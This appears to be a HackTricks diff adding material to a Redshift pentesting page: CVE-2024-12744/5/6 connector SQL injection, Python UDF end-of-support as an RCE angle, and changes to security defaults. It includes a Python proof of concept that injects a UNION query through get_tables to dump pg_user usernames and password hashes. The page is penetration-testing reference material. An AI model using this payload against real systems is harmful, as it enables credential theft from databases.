Add content from: Research Update: Enhanced src/network-services-pentesting/54...

Author: HackTricks News Bot

src/network-services-pentesting/5439-pentesting-redshift.md

@@ -58,15 +58,26 @@ Errors differentiate bad password vs missing user → potential **username enume
 - If login succeeds, Redshift lacks superuser in serverless; in provisioned clusters the master user has broad rights including creating UDFs (Python), external schema to Spectrum, COPY from attacker S3, and `UNLOAD` to exfil data.
 - Check cluster parameter group for `max_concurrency_scaling_clusters`, `require_ssl`, `enable_user_activity_logging` – logging disabled aids stealth.
 - Serverless workgroups still reachable via TCP; same SQL attack surface as provisioned clusters.
+- **Client-side metadata SQLi (Dec 2024)**: JDBC 2.1.0.31, Python connector 2.1.4 and ODBC 2.1.5.0 build metadata queries with unquoted user input in `getSchemas/getTables/getColumns` (CVE-2024-12744/5/6). If an app lets attackers control catalog or pattern arguments, you can inject arbitrary SQL that runs with the DB user used by the connector.
+  ```python
+  # exploit vulnerable python connector 2.1.4 via metadata API
+  import redshift_connector
+  conn = redshift_connector.connect(host='<endpoint>', database='dev', user='lowpriv', password='pw')
+  cur = conn.cursor()
+  # injection in table_pattern leaks data from pg_tables
+  cur.get_tables(table_schema='public', table_name_pattern="%' UNION SELECT usename,passwd FROM pg_user--")
+  ```
+- **UDF execution model change**: Python UDFs stop working June 30, 2026; only Lambda UDFs allowed after. Offensive impact: legacy provisioned clusters still run Python UDFs for in-cluster code exec (no FS/network). Lambda UDFs move code to Lambda where the IAM role may reach Internet/VPC endpoints for SSRF/pivot but with no direct cluster filesystem access. Hunting old clusters with Python UDFs enabled can still yield RCE primitives.
 
 ## Recent security changes (offense impact)
 
-- **Public access disabled by default** on new clusters/snapshots; legacy ones may still be public.
+- **Public access disabled by default** on new clusters/snapshots (Jan 10, 2025 change). Legacy ones may still be public.
 - **Encryption at rest + enforced TLS by default** means sniffing/mitm harder; need valid credentials or SSRF into VPC path.
+- **Serverless VPCE rollout change (Jun 27, 2025)**: workgroup endpoints created in up to 3 AZs at creation time. Discovery tools should enumerate all workgroup VPCE DNS names per AZ to find reachable IPs.
 
 ## References
 
-- [AWS Security Blog – Redshift enhances security defaults (public access off, require SSL, encryption) – Nov 2024](https://aws.amazon.com/blogs/security/amazon-redshift-enhances-security-by-changing-default-behavior-in-2025/)
-- [AWS Docs – Options for providing IAM credentials (JDBC/ODBC IAM/SAML plugins)](https://docs.aws.amazon.com/redshift/latest/mgmt/options-for-providing-iam-credentials.html)
+- [AWS Security Bulletin – SQLi in Redshift JDBC/Python/ODBC drivers (CVE-2024-12744/5/6)](https://aws.amazon.com/security/security-bulletins/AWS-2024-015/)
+- [AWS Big Data Blog – Python UDF end-of-support and migration to Lambda UDFs (Jan 2026)](https://aws.amazon.com/blogs/big-data/amazon-redshift-python-user-defined-functions-will-reach-end-of-support-after-june-30-2026/)
 
 {{#include ../banners/hacktricks-training.md}}